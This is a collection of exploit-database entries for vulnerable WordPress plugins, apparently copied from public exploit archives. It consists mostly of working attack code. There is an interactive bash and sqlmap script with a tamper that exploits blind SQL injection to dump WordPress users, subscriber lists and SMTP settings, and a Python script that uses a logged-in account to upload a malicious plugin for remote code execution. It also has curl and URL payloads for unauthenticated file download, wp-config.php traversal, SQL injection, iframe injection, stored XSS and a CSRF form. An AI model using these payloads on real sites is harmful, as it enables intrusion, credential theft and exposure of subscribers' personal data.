# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBA@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: <= 4.2.2
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-19985
################################################################################################
# ___ ___ ___ ___ ___ #
# /\ \ /\ \ /\ \ /\ \ /\ \ ___ #
# /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ #
# /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ #
# _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ #
# /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ #
# \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / #
# \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ #
# \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ #
# \::/ / \::/ / \::/ / \:\__\ \/__/ #
# \/__/ \/__/ \/__/ \/__/ #
# ___ ___ ___ ___ #
# /\ \ /\ \ /\ \ /\ \ #
# /::\ \ /::\ \ /::\ \ /::\ \ #
# EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ #
# Email Subscribers & Newsletters <= 4.2.2 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ #
# Unauthenticated File Download /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #
# \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ #
# \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ #
# \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ #
# \:\__\ \::/ / \:\__\ \:\__\ #
# KBAZ \/__/ \/__/ \/__/ \/__/ #
# #
# #
################################################################################################
curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all'
EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBAZ@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: < 4.3.3
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-20361
# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361
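main () {
    # Entry point: expects exactly one argument (the target base URL),
    # writes the sqlmap tamper script and then serves an interactive menu
    # until the user picks 0.
    header
    if [ "$#" -ne 1 ]; then
        echo "Usage : bash CVE-2019-20361.sh [BASE URL]"
        echo "Example : bash CVE-2019-20361.sh http://127.0.0.1/"
        exit 1
    fi
    url=$1
    echo ' Target URL : ' "$url"
    echo ' Generating sqlmap tamper script in /tmp'
    gen_sqlmap_tamper
    # Kept as an array so the URL (which contains '*' and '&') is never
    # subjected to globbing or word splitting when the command is run.
    # NOTE: --risk 3 enables OR-based payloads that can alter rows in the
    # target's wp_ig_actions table; lower it on systems you must not modify.
    sqlmap_cmd=(sqlmap -u "${url}?es=open&hash=*" --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3)
    echo ' SQLMap base command : ' "${sqlmap_cmd[*]}"
    while true; do
        sleep 1
        echo ''
        echo " Possible choices: "
        echo ''
        echo " 0) Exit"
        echo " 1) Simple vulnerability test SLEEP(5)"
        echo " 2) Vulnerability test with SQLMap "
        echo " 3) Get WP users data"
        echo " 4) Get subscribers information"
        echo " 5) Get 'Simple WP SMTP' settings"
        echo ''
        echo -n ' Choice number => '
        read -r n
        case $n in
            0) exit ;;
            1)
                echo 'Testing SLEEP(5)...'
                # The hash is the base64 JSON built in raw_commands, with
                # "(SELECT SLEEP(5))" injected into contact_id. `time` reports
                # e.g. "real 0m5.012s"; the decimal separator is locale
                # dependent ('.' or ','), so match either, otherwise a
                # vulnerable target is reported as "Not vulnerable".
                { time (curl -i -s -k "${url}"'?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) ; } |& grep -q '0m5[.,]' \
                    && echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m" \
                    || echo ' [-] Not vulnerable'
                ;;
            2) "${sqlmap_cmd[@]}" ;;
            3) "${sqlmap_cmd[@]}" -T wp_users,wp_usermeta --dump ;;
            4) "${sqlmap_cmd[@]}" -T wp_ig_contacts --dump ;;
            5) "${sqlmap_cmd[@]}" --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;;
            *) echo "Invalid option" ;;
        esac
    done
}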
header () {
    # Prints the banner shown at start-up. A quoted heredoc keeps every
    # backslash of the ASCII art literal, exactly as the echo lines did.
    cat <<'BANNER'

 ################################################################################################
 # ___ ___ ___ ___ ___ #
 # /\ \ /\ \ /\ \ /\ \ /\ \ ___ #
 # /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ #
 # /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ #
 # _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ #
 # /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ #
 # \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / #
 # \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ #
 # \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ #
 # \::/ / \::/ / \::/ / \:\__\ \/__/ #
 # \/__/ \/__/ \/__/ \/__/ #
 # ___ ___ ___ ___ #
 # /\ \ /\ \ /\ \ /\ \ #
 # /::\ \ /::\ \ /::\ \ /::\ \ #
 # EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ #
 # Email Subscribers & Newsletters < 4.3.1 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ #
 # Unauthenticated Blind SQL Injection /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #
 # \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ #
 # \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ #
 # \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ #
 # \:\__\ \::/ / \:\__\ \:\__\ #
 # KBAZ \/__/ \/__/ \/__/ \/__/ #
 # #
 # #
 ################################################################################################

BANNER
}
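raw_commands () {
    # Reference material, never called by main: how the malicious hash is
    # built, the one-shot timing check, and the sqlmap invocation. The
    # per-menu extra options are kept as comments because on their own
    # they are not commands (the original would have tried to run "-T").
    # Note the spaces echo inserts around the injected value; the base64
    # string below (and in main) encodes exactly that output.
    echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100" '","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' | base64 -w 0
    # `time` output uses the locale's decimal separator ('.' or ',').
    { time (curl -i -s -k 'http://127.0.0.1/?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) ; } |& grep -q '0m5[.,]' && echo '[+] Vulnerable' || echo '[-] Not vulnerable'
    sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3
    # Extra sqlmap options used by menu entries 3-5:
    #   -T wp_users,wp_usermeta --dump
    #   -T wp_ig_contacts --dump
    #   --sql-query 'select * from wp_options where option_name="swpsmtp_options"'
}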
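gen_sqlmap_tamper () {
    # Writes the sqlmap tamper script that wraps each payload into the
    # base64-encoded JSON "hash" parameter the plugin decodes; contact_id is
    # the injection point (see the INSERT reproduced inside the script).
    # NOTE(review): fixed, predictable names in world-writable /tmp let
    # another local user pre-create or replace the file that sqlmap then
    # imports and executes as Python; run from a private directory when
    # sharing the host.
    touch /tmp/__init__.py
    cat << '_END' > /tmp/tamper_CVE-2019-1356989.py
#!/usr/bin/env python
# sqlmap tamper script for CVE-2019-20361 (Email Subscribers & Newsletters)
import base64


def tamper(payload, **kwargs):
    # Benign hash, JSON-decoded:
    # {"message_id":"100","campaign_id":"100","contact_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}
    # Query it feeds:
    # INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = count+1, updated_at = '1595001866'
    param = '{"contact_id":"'
    param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100"
    param += '","campaign_id":"100","message_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}'
    # str.replace instead of '%' formatting so a payload containing '%' cannot
    # break the template. b64encode works on Python 2 and 3 and emits no
    # newlines (base64.encodestring was removed in Python 3.9, which broke
    # this tamper under current sqlmap).
    wrapped = param.replace('%s', str(payload))
    return base64.b64encode(wrapped.encode('utf-8')).decode('utf-8')
_END
}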
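# Quoted so an argument containing spaces reaches main as one word.
main "$@"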
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure
# Google Dork:
# Date: 2018-01-23
# Exploit Author: ThreatPress Security
# Vendor Homepage: http://icegram.com/
# Software Link: https://wordpress.org/plugins/email-subscribers/
# Version: 3.4.7
# Tested on: WordPress 4.9.2
# CVE :
Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed
the vulnerability that allows an unauthenticated user to download the entire subscriber
list with names and e-mail addresses.
Exploit:
<!-- Submits option=view_all_subscribers to the plugin's ?es=export handler.
     Per the advisory this needs no WordPress session, so it works from any
     page the attacker hosts; replace DOMAINTOTEST.com with the target. -->
<form action="http://DOMAINTOTEST.com/?es=export" method="post">
<input type="text" name="option" value="view_all_subscribers" />
<input type="submit" value="Exploit" />
</form>
source: https://www.securityfocus.com/bid/53850/info
The Email Newsletter plugin for WordPress is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
An attackers can exploit this issue to obtain sensitive information that may aid in further attacks.
Email Newsletter 8.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=registered_user
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=view_suscriber
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=commentposed_user
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=contact_user
# Exploit Title: WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/16/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://elementor.com/
# Software Link: https://wordpress.org/plugins/elementor/advanced/ (scroll down to select the version)
# Version: 3.6.0, 3.6.1, 3.6.2
# Tested on: WordPress 5.9.3 (os-independent since this exploit does NOT provide the payload)
#!/usr/bin/python
import requests
import re
# WARNING: This exploit does NOT include the payload.
# Also, be sure you already have some valid credentials. This exploit needs an account in order to work.
# # # # # VULNERABILITY DESCRIPTION # # # # #
# The WordPress plugin called Elementor (v. 3.6.0, 3.6.1, 3.6.2) has a vulnerability that allows any authenticated user to upload and execute any PHP file.
# This vulnerability, in the OWASP TOP 10 2021, is placed in position #1 (Broken Access Control)
# The file that contains this vulnerability is elementor/core/app/modules/onboarding/module.php
#
# At the end of this file you can find this code:
# add_action( 'admin_init', function() {
# if ( wp_doing_ajax() &&
# isset( $_POST['action'] ) &&
# isset( $_POST['_nonce'] ) &&
# wp_verify_nonce( $_POST['_nonce'], Ajax::NONCE_KEY )
# ) {
# $this->maybe_handle_ajax();
# }
# } );
#
# This code is triggered whenever ANY user account visits /wp-admin
# In order to work we need the following 4 things:
# 1. The call must be an "ajax call" (wp_doing_ajax()) and the method must be POST. In order to do this, we only need to call /wp-admin/admin-ajax.php
# 2. The parameter "action" must be "elementor_upload_and_install_pro" (check out the function named maybe_handle_ajax() in the same file)
# 3. The parameter "_nonce" must be retrieved after login by inspecting the /wp-admin page (this exploit does this in DoLogin function)
# 4. The parameter "fileToUpload" must contain the ZIP archive we want to upload (check out the function named upload_and_install_pro() in the same file)
#
# The file we upload must have the following structure:
# 1. It must be a ZIP file. You can name it as you want.
# 2. It must contain a folder called "elementor-pro"
# 3. This folder must contain a file named "elementor-pro.php"
# 4. The payload must contain AT LEAST the plugin name, otherwise WordPress will NOT accept it and the upload will FAIL
# e.g.
# <?php
# /**
# * Plugin Name: Elementor Pro
# */
# // Actual PHP payload
# ?>
# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
#
# WARNING: The fake plugin we upload will be activated by Elementor, this means that each time we visit any page we trigger our payload.
# If it tries, for example, to connect to an offline host, it could lead to a Denial of Service.
# In order to prevent this, I suggest you to use some variable to activate the payload.
# Something like this (visit anypage.php?activate=1 in order to continue with the actual payload):
# if (!isset($_GET['activate']))
# return;
# Change the following 4 variables:
# --- Target configuration: edit these four values before running -----------
payloadFileName = 'elementor-pro.zip'          # path of the ZIP archive holding your payload (structure described above)
baseUrl = 'http://192.168.56.103/wordpress/'   # base URL of the target, trailing slash included
username = 'guest'                             # WordPress account used to log in (any authenticated user works)
password = 'test'                              # its password
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# One session so the auth cookies set by wp-login.php are reused by the
# upload and activation requests.
session = requests.Session()
# WordPress sets and checks this cookie to confirm the client accepts cookies.
cookies = dict(wordpress_test_cookie='WP+Cookie+check')
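def DoLogin(username, password):
    """Log in to WordPress and return the Elementor AJAX nonce, or None.

    Posts the credentials to wp-login.php with redirect_to set to
    /wp-admin/, then scrapes the nonce from the
    "ajax":{"url":"...admin-ajax.php","nonce":"..."} fragment of the page
    that follows. Prints an error and returns None when the fragment is
    missing, which usually means the credentials were rejected (or the
    page layout differs from the WordPress 5.9.3 this was tested on).
    """
    loginUrl = baseUrl + 'wp-login.php'
    adminUrl = baseUrl + 'wp-admin/'
    data = {'log': username, 'pwd': password, 'wp-submit': 'Login', 'redirect_to': adminUrl, 'testcookie': 1}
    # Example fragment: "ajax":{"url":"http:\/\/baseUrl\/wp-admin\/admin-ajax.php","nonce":"4e8878bdba"}
    # [^"]+ stops at the closing quote; the previous greedy .+ could run
    # past the nonce to a later "} on the same line and return garbage.
    regexp = re.compile(r'"ajax":\{"url":"[^"]*admin\-ajax\.php","nonce":"([^"]+)"\}')
    response = session.post(loginUrl, cookies=cookies, data=data)
    search = regexp.search(response.text)
    if not search:
        print('Error - Invalid credentials?')
        # print(response.text)  # uncomment to inspect the page and fix the regexp
        return None
    return search.group(1)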
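def UploadFile(fileName, nonce):
    """Upload the ZIP as a fake "Elementor Pro" via admin-ajax.php.

    Sends action=elementor_upload_and_install_pro with the nonce obtained
    at login and the archive as fileToUpload. Returns True when the
    response contains "elementorProInstalled":true, False otherwise
    (e.g. when a real Elementor Pro is already installed). The archive is
    opened in a with-block so the handle is closed even if the request
    raises.
    """
    uploadUrl = baseUrl + 'wp-admin/admin-ajax.php'
    data = {'action': 'elementor_upload_and_install_pro', '_nonce': nonce}
    with open(fileName, 'rb') as archive:
        files = {'fileToUpload': archive}
        response = session.post(uploadUrl, data=data, files=files)
    if '"elementorProInstalled":true' not in response.text:
        print('Error - Upload failed')
        # print(response.text)  # uncomment to investigate further
        return False
    print('Upload completed successfully!')
    return True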
# Define YOUR method to activate your payload (if needed)
def ActivatePayload():
    """Trigger the uploaded plugin by requesting index.php?activate=1.

    Matches the `if (!isset($_GET['activate'])) return;` guard suggested
    in the header; adapt the query string if your payload uses another
    trigger.
    """
    session.get(baseUrl + 'index.php?activate=1')
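print('Trying to login...')
nonce = DoLogin(username, password)
if nonce is None:
    # DoLogin already reported the failure; stop here instead of crashing
    # on 'Nonce found: ' + None.
    raise SystemExit(1)
print('Nonce found: ' + nonce)
print('Uploading payload...')
fileUploaded = UploadFile(payloadFileName, nonce)
# Define YOUR method to activate your payload (if needed)
if fileUploaded:
    print('Activating payload...')
    ActivatePayload()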
# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection
# Date: 28.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://elementor.com/
# Version: < 3.5.5
# Tested on: Google and Firefox latest version
# CVE : CVE-2022-4953
# 1. Description
The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.
# 2. Proof of Concept (PoC)
Proof of Concept (the settings value is the base64 of {"type":"video","url":"https://downloadmoreram.com/"}; replace the url with the page to be framed). Because the payload lives in the URL fragment after '#', it is never sent to the server, so server-side logs or a WAF will not see it:
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K
source: https://www.securityfocus.com/bid/56479/info
The Eco-annu plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/eco-annu/map.php?eid=[SQL]
# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================
Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php build queries with sprintf(), whose %s placeholders simply interpolate user input without escaping or
parameterizing it; $wpdb->prepare() (or at minimum $wpdb->_real_escape on each value) should be used instead.
90 $wpdb->query(sprintf("UPDATE $mapsTable
91 SET PolyLines = '%s'
92 WHERE ID = '%s';", $PolyLines, $mapID));
.
.
.
163 $wpdb->query(sprintf("
164 UPDATE $mapsTable
165 SET TemplateID = '%s',
166 MapName = '%s',
167 Settings = '%s',
168 LastInvoked = CURRENT_TIMESTAMP,
169 CSSValues = '%s',
170 CSSValuesList = '%s',
171 CSSValuesHeading = '%s',
172 MapHTML = '%s',
173 IsActive = 1,
174 ThemeID = '%s'
175 WHERE ID = %s;",
176 $Items['mapTemplateName'],
177 $Items['mapName'],
178 urldecode($Items['mapSettingsXML']),
179 urldecode($Items["mapCSSXML"]),
180 urldecode($Items["listCSSXML"]),
181 urldecode($Items["headingCSSXML"]),
182 urldecode($Items["mapHTML"]),
183 $Items['mapThemeName'],
184 $mapID));
185 } else {
186
187 //this is a map insert
188 if (!$wpdb->query(sprintf("
189 INSERT INTO $mapsTable(
190 TemplateID,
191 MapName,
192 DefaultPinImage,
193 Settings,
194 LastInvoked,
195 PolyLines,
196 CSSValues,
197 CSSValuesList,
198 CSSValuesHeading,
199 MapHTML,
200 IsActive,
201 ThemeID
202 ) VALUES ('%s', '%s', '%s', '%s',
203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');",
204 $Items['mapTemplateName'],
205 $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . "images/map_pins/pins/111.png",
206 urldecode($Items['mapSettingsXML']), '',
207 urldecode($Items["mapCSSXML"]),
208 urldecode($Items["listCSSXML"]),
209 urldecode($Items["headingCSSXML"]),
210 urldecode($Items["mapHTML"]),
211 $Items['mapThemeName'])))
.
.
267 $wpdb->query(sprintf("
268 UPDATE $mapsTable
269 SET MapName = '%s',
270 LastInvoked = CURRENT_TIMESTAMP,
271 IsActive = 1
272 WHERE ID = %s;", $mapName, $mapID));
In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing ../ to create files outside of intended directory:
4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {
12
13 if (!file_exists($imagesDirectory)) {
14 mkdir($imagesDirectory);
15 }
CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:
Exploit Code:
• $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3
# Exploit Title: Wordpress Plugins Easy Testimonials 3.2 - Cross-Site Scripting
# Date: 2018-11-23
# Exploit Author: En_dust
# Vendor Homepage: https://wordpress.org/plugins/easy-testimonials/
# Software Link: https://wordpress.org/plugins/easy-testimonials/
# Version: 3.2
# CVE : N/A
# Tested on: Windows 10 x64
# description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins easy testimonials 3.2.
# Three parameters(_ikcf_client _ikcf_position _ikcf_other) have Cross-Site Scripting.
# POC
# XSS Stored
POST http://localhost/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2152
Referer: http://localhost/wp-admin/post-new.php?post_type=testimonial&wp-post-new-reload=true
Cookie: wp-saving-post=25-check; wp-saving-post=22-saved; wordpress_524b5a925bc7b1b05f5b295d7fcd09b9=admin%7C1543134496%7CkuybvZvg3evKxitZn7s2lZSoaeDOfbTwXP0iMKFz425%7C481919de475c08441e455ffe01f4b8a241ea13f3a4255be476841ddc281597bc; wp-settings-time-1=1542959022; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26posts_list_mode%3Dexcerpt; PHPSESSID=au6fo2rac6sn2hgk0mnniq17k2; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_524b5a925bc7b1b05f5b295d7fcd09b9=admin%7C1543134496%7CkuybvZvg3evKxitZn7s2lZSoaeDOfbTwXP0iMKFz425%7C9bce6802e21d94bc37ab3eabf8dfe2950603d327e32a8ad14e167b4550d036dc
Connection: keep-alive
Upgrade-Insecure-Requests: 1
_wpnonce=b3ca69b020&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dtestimonial&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=testimonial&original_post_status=auto-draft&referredby=&_wp_original_http_referer=&auto_draft=&post_ID=25&meta-box-order-nonce=c25a6e37b2&closedpostboxesnonce=4784cc9ba9&post_title=test&samplepermalinknonce=f39f8eec26&content=test&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&aa=2018&mm=11&jj=23&hh=17&mn=12&ss=56&hidden_mm=11&cur_mm=11&hidden_jj=23&cur_jj=23&hidden_aa=2018&cur_aa=2018&hidden_hh=17&cur_hh=17&hidden_mn=12&cur_mn=12&original_publish=%E5%8F%91%E5%B8%83&publish=%E5%8F%91%E5%B8%83&tax_input%5Beasy-testimonial-category%5D%5B%5D=0&neweasy-testimonial-category=%E6%96%B0%E5%88%86%E7%B1%BB%E7%9B%AE%E5%BD%95%E5%90%8D&neweasy-testimonial-category_parent=-1&_ajax_nonce-add-easy-testimonial-category=50d8975094&my-custom-fields_wpnonce=b074ff3409&_ikcf_client=[XSS]&_ikcf_email=test%40test.com&_ikcf_position=[XSS]&_ikcf_other=[XSS]&_ikcf_rating=1&excerpt=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=81df7811e1&post_name=&post_grid_post_settings_input_nonce=95c656b2da&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dtestimonial&post_grid_post_settings%5Bpost_skin%5D=flat&post_grid_post_settings%5Bcustom_thumb_source%5D=http%3A%2F%2Fwww.wordpress.com%2Fwp-content%2Fplugins%2Fpost-grid%2Fassets%2Ffrontend%2Fcss%2Fimages%2Fplaceholder.png&post_grid_post_settings%5Bfont_awesome_icon%5D=&post_grid_post_settings%5Bfont_awesome_icon_color%5D=737272&post_grid_post_settings%5Bfont_awesome_icon_size%5D=50px&post_grid_post_settings%5Bcustom_youtube_id%5D=&post_grid_post_settings%5Bcustom_vimeo_id%5D=&post_grid_post_settings%5Bcustom_dailymotion_id%5D=&post_grid_post_settings%5Bcustom_mp3_url%5D=&post_grid_post_settings%5Bcustom_soundcloud_id%5D=
====================================================
Product: Easy Social Icons WordPress plugin
Vendor: CyberNetikz
Tested Version: 1.2.2
Vulnerability Type: XSS [CWE-79] and CSRF [CWE-352]
Risk Level: Medium
Solution Status: Solved in version 1.2.3
Discovered and Provided: Eric Flokstra - ITsec Security Services
====================================================
[-] About the Vendor:
Easy Social Icons is a WordPress plugin and can be used to set icons on the public page in order to link to social media platforms such as LinkedIn, Twitter or Facebook.
[-] Advisory Details:
It is discovered that insufficient validation is performed on the 'image_file' parameter enabling arbitrary JavaScript to be injected. On top of that no random tokens are used to prevent CSRF attacks. By combining these vulnerabilities an attacker could for example trick an admin into setting a persistent XSS payload on the public WordPress page.
[-] Proof of Concept:
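<!-- CSRF PoC: an administrator who loads this page submits the Easy Social
     Icons edit form with a JavaScript payload in image_file. The plugin
     checks no nonce and stores the value, so the script ends up on the
     public page. (A stray mail-client copy of the action URL that broke the
     <form> tag has been removed.) -->
<html>
<body>
<form action="http://10.0.2.215/wordpress/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1" method="POST" enctype="multipart/form-data">
<input type="hidden" name="title" value="Example" />
<input type="hidden" name="image_file" value="http://10.0.2.215/wordpress/wp-content/uploads/2015/02/cookie.jpg"><script>alert(1)</script>" />
<input type="hidden" name="url" value="http://www.example.org" />
<input type="hidden" name="sortorder" value="0" />
<input type="hidden" name="target" value="1" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="submit_button" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>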
[-] Disclosure Timeline:
[02 Feb 2015]: Vendor notification
[02 Feb 2015]: Vulnerability confirmation
[11 Feb 2015]: Vulnerability patched
[19 Feb 2015]: Public disclosure
[-] Solution:
Update to the latest version of Easy Social Icons.
[-] References:
[1] Easy Social Icons Changelog -- https://wordpress.org/plugins/easy-social-icons/changelog/
[2] Common Weakness Enumeration (CWE) -- http://cwe.mitre.org
[3] ITsec Security Services BV -- http://www.itsec.nl
------------------------------------------------------------------------
ITsec Security Services bv. (KvK. 34181927)
Postal Address:
P.O. Box 5120, 2000GC Haarlem
Visitors Address:
Kenaupark 23, 2011 MR Haarlem
Phone: +31 - (0)23 542 05 78
DefenseCode ThunderScan SAST Advisory
WordPress Easy Modal Plugin
Multiple Security Vulnerabilities
Advisory ID: DC-2017-01-007
Advisory Title: WordPress Easy Modal Plugin Multiple Vulnerabilities
Advisory URL: http://www.defensecode.com/advisories.php
Software: WordPress Easy Modal plugin
